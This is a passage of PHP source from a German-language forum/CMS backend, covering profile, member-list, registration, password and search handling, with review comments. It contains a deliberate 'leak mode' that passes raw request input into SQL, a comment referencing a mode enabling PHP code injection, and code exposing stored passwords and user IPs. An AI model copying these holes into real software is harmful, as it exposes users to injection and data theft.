// so leak mode must stay unreachable on any deployment holding real data. A bound parameter would make both modes safe.
if($usr = $sql['aq']($conn,"
select (select count(*)
from [forum]
where userid = $var and mailid is null and status".(($status%4 == 0) ? "%2 = 0" : " is not null").")
||','|| (select count(*)
from [forum]
where userid = $var and mailid is not null and status is not null)
||','|| (select count(*)
from [forum]
where userid = $var and mailid is not null and status is not null and status/2%2 = 0)
||','|| (select count(*)
from [forum]
where mailid = $var and userid != $var and status is not null)
||','|| (select count(*)
from [forum]
where mailid = $var and userid != $var and status is not null and status/2%2 = 0)
||','|| (select count(*)
from [forum]
where mailid = userid and userid = $var and status".(($status%4 == 0) ? "%2 = 0" : " is not null").")
||','|| (select count(*)
from [file]
where user=$var and status ".(($status%4 == 0) ? '' : '<')."= 1)
||','|| (select sum(abs(size))
from [file]
where user=$var and status is not null) as count,
*
from [user] as u
where ".(($status/2%2) ? "" : "status is not null and ")."id=".((isset($_GET['id']) and $_GET['id']) ? (($leak) ? $_GET['id'] : preg_replace('/\D/','',$_GET['id'])) : (($var) ? $var: $uid)))) {
// Keep the first row; the query selects '*', so it carries every column of [user].
$usr = reset($usr);
// '@' suppresses errors from this merge (for example missing keys in the row).
if(isset($usr['id']))
@$creolevar = array_merge($creolevar,array('type' => 'profil', 'id' => $usr['id'], 'name' => $usr['username'], 'from' => $usr['username'], 'title' => $usr['tagline'], 'create' => strtotime($usr['create']), 'change' => strtotime($usr['change']), 'right' => ((is_null($usr['status'])) ? -1 : ($usr['status']/2%2))));
$v = "
";
$k = substr($v,0,-1)." nowrap>";
// passhelp is stored as "<number>-[<custom question>:]<answer>"; it is split into (question text, answer),
// using $pass[<number>] when no custom question is present.
if(isset($usr['passhelp']) and preg_match('/^(\d+)-(?:(.+):)?(.+)$/',$usr['passhelp'],$val) and isset($pass[$val[1]]))
$usr['passhelp'] = array((($val[2] != '') ? $val[2] : $pass[$val[1]]),$val[3]);
// Pad the comma-joined counter string so the explode() below always yields enough fields.
if(substr_count($usr[0],",") < 6)
$usr[0] .= ",0,0,0,0,0,0,0";
$val = explode(',',$usr[0]); // count,mailout,newout,mailin,newin,blog,upload,bytes
// Branch taken for the profile owner, or when bit 1 of $status is set (presumably elevated rights -- confirm).
if(($uid == $var or $status/2%2) and isset($usr['id']) and $usr['id']) {
$out .= "
";
$request = 'Mitglieder';
}
}
else
$request = 'Mitglieder';
}
# Profile edit form: emitted only for the 'Bearbeiten' request when both $uid and $rw are truthy.
if ($request == 'Bearbeiten' && $uid && $rw) {
    $out .= "
";
}
# Member list: one page of users with their post, mail and file counters.
if($request == 'Mitglieder' and (!$lone or $user or $uid)) {
// The "status is not null" filter is dropped only when $id is set and bit 1 of $status is set
// (presumably elevated rights -- confirm), which then also lists users whose status is null.
$data = (($id and $status/2%2) ? "" : "\n\twhere u.status is not null");
$num = $sql['sq']($conn,"select count(*) from [user] as u$data");
if($page[0] == '')
$page = array(1,"page=1");
// The return value is discarded. Presumably $paging[5] is an /e pattern whose evaluated replacement sets the paging
// variables ($val is used in the limit clause below) -- confirm. The /e modifier no longer exists from PHP 7 on.
preg_replace($paging[5],$paging[6],"$num,$max,#key#");
// NOTE(review): the query returns ip, mail and useragent for every listed user. The row markup is not visible in this
// copy, so check which viewers actually get these columns rendered.
// The order-by text is produced by the $sorth[2]/$sorth[3] pattern pair, and $val/$max go into the limit clause;
// all are assigned outside this view -- confirm none of them can carry request text into the SQL.
if($rows = $sql['aq']($conn,"
select u.username as username,
u.[create],
u.change,
f.count as count,
m.bcount as blogs,
m.count as mails,
d.count as files,
u.status/4%2||','||ifnull(u.chat,'-'),
u.status/2%2,
u.status%2,
u.page as page,
u.forename as fore,
u.lastname as last,
u.ip as ip,
u.id as id,
u.chat as chat,
u.mail as mail,
u.status as status,
u.useragent as agent,
u.tagline as tagline,
p.id as profil,
s.id as script,
strftime('%d.%m.%Y %H:%M',u.[create]) as angemeldet,
strftime('%d.%m.%Y %H:%M',u.change) as aktion,
f.userid as userid,
m.mid as mailid,
m.rcount as rcount,
d.pcount as pcount,
t.tcount as tcount,
c.username as chatuser
from [user] as u
left join ( select userid,
count(*) as count
from [forum]
where status".(($status%4 == 0) ? "%2 = 0" : " is not null")." and mailid is null
group by userid) as f
on f.userid = u.id
left join ( select u.id as mid,
count(f.id)-count(b.id) as count,
count(b.id) as bcount,
count(m.id)-count(r.id) as rcount
from [user] as u
left join [forum] as f on f.userid = u.id or f.mailid = u.id
left join [forum] as r on r.id = f.id and r.mailid = u.id and r.status/2%2 = 1
left join [forum] as m on m.id = f.id and m.mailid = u.id
left join [forum] as b on b.id = f.id and b.mailid = u.id and b.mailid = b.userid and b.status".(($status%4 == 0) ? "%2 = 0" : " is not null")."
where f.status is not null and f.mailid is not null
group by u.id) as m
on m.mid = u.id
left join ( select a.user,
count(*) as count,
count(p.id) as pcount
from [file] as a
left join [file] as p on p.id = a.id and p.status/2%2 = 0
where a.status is not null
group by a.user) as d
on d.user = u.id
left join ( select userid,
count(*) as tcount
from [forum] as t
where path is null and mailid is null and t.status is not null
group by userid) as t
on t.userid = u.id
left join [user] as p on p.id = u.id and p.profil is not null
left join [user] as s on s.id = p.id and s.profil like '%%'
left join [user] as c on c.id = u.chat"
.$data.preg_replace($sorth[2],$sorth[3],"u.username;13;u.username")."
limit $val,$max")) {
// One entry per user row; the row markup is empty in this copy.
$row = array();
foreach($rows as $var)
$row[] = "
";
$out .= "";
}
}
# Registration / account data form ('Daten' and 'Anmelden' requests).
if(preg_match('/^(Dat|Anmeld)en$/',$request) and ($uid or $user) and $rw) {
if($uid) {
// Loads the current user's row. When bit 1 of $status is set (presumably elevated rights -- confirm) and the request
// carries an id, the first run of digits in it selects another user's row instead; only those digits reach the SQL.
$array = reset(($sql['aq']($conn,"select * from [user] where id=".(($status/2%2 and isset($_REQUEST['id']) and preg_match('/\d+/',$_REQUEST['id'],$var)) ? $var[0] : $uid),SQLITE_ASSOC)));
// NOTE(review): with bit 1 of $status set, the stored password value is copied into the data that fills the form
// (merged into $post below). The form markup is not visible here -- check that the value is never written into the page.
if($status/2%2)
$array['userpass'] = $array['password'];
elseif($array['password'] == '')
$post['userpass'] = '';
unset($array['password']);
// passhelp is stored as "<number>-[<custom question>:]<answer>"; a falsy question number means the custom text is used.
if(preg_match('/^(\d+)-(?:(.+):)?(.+)$/',$array['passhelp'],$var)) {
if(!$post['question'] = $var[1])
$post['myquestion'] = $var[2];
$post['answer'] = $var[3];
}
// Fill $post from the stored row wherever the submitted value is missing or differs only in letter case.
foreach($array as $key => $var)
if(!isset($post[$key]) or strtolower($post[$key]) == strtolower($var))
$post[$key] = $var;
}
$out .= '
';
// $register is interpolated into the like pattern; it is assigned outside this view -- confirm it cannot carry request
// text. The CMS content goes through strtr() with array_slice($html,1) and then through the $creole pattern table.
// NOTE(review): elsewhere in this file the first $creole pattern is rewritten when leak mode is on (marked there as
// enabling PHP code injection), so stored content is evaluated differently in that mode; '@' hides any resulting errors.
if($request == "Anmelden" and $register)
$out .= "
".@preg_replace(array_keys($creole),array_values($creole),strtr($sql['sq']($conn,"
select content
from cms
where name like '$register'
limit 1"),array_slice($html,1)))."
";
}
# Forgotten-password form: emitted only for the 'Kennwort' request when $uid is falsy and $rw is truthy.
if ($request == 'Kennwort' && !$uid && $rw) {
    $out .= '
';
}
# Suchformular
if($request == 'Suche') {
$usr = $sql['aq']($conn,"
select u.id as id,
username as username,
count(a.id) as acount,
count(b.id) as bcount,
ifnull(dcount,0) as dcount,
count(f.id) as fcount,
count(m.id) as mcount,
max( ifnull(max(a.[create]),0),
ifnull(max(d.ctime),0)) as time
from ( select 0 as id, 'Unbekannt' as username
union
select id,username
from [user] as u
where status is not null) as u
left join ( select user,count(*) as dcount,[create] as ctime
from file
where status ".(($status%4 == 0) ? '' : '<')."= 1
group by user) as d on u.id = d.user
left join forum as a on u.id = a.userid
and a.status".(($status%4 == 0) ? "%2 = 0" : " is not null")."
left join forum as b on a.id = b.id
and b.mailid = b.userid
left join forum as f on a.id = f.id
and f.mailid is null
left join forum as m on a.id = m.id
and m.mailid is not null
and m.mailid != m.userid
".(($status/2%2) ? '' : str_replace('x',(($uid) ? $uid : 0),"and (m.mailid = x or m.userid = x)"))."
group by u.id
having acount > 0 or dcount > 0
order by username");
$wrt = array('b' => 0, 'd' => 0, 'f' => 0, 'm' => 0);
$array = array();
$val = 0;
foreach($usr as $key => $var) {
$usr[$key] = "";
$array[$var['id']] = $var['id'];
if($val < $a = strtotime($var['time']))
$val = $a;
foreach(array_keys($wrt) as $a) {
$array[$var['id']] .= ','.$var[$a.'count'];
if($var[$a.'count'])
$wrt[$a] += $var[$a.'count'];
}
}
$rows = array();
if($wrt['b'])
$rows[] = "";
if($var = $sql['sq']($conn,"select count(*) from [cms] where status/8%2".(($status/2%2) ? "" : " and status/2%4 <= ".($status/2%2 + $status%2*2))))
$rows[] = "";
if($wrt['d'])
$rows[] = "";
if($wrt['f'])
$rows[] = "";
if($wrt['m'])
$rows[] = "";
$line = array();
foreach(array(1,2,3,5,10,20,25,50,75,100) as $var)
$line[] = "";
$out .= "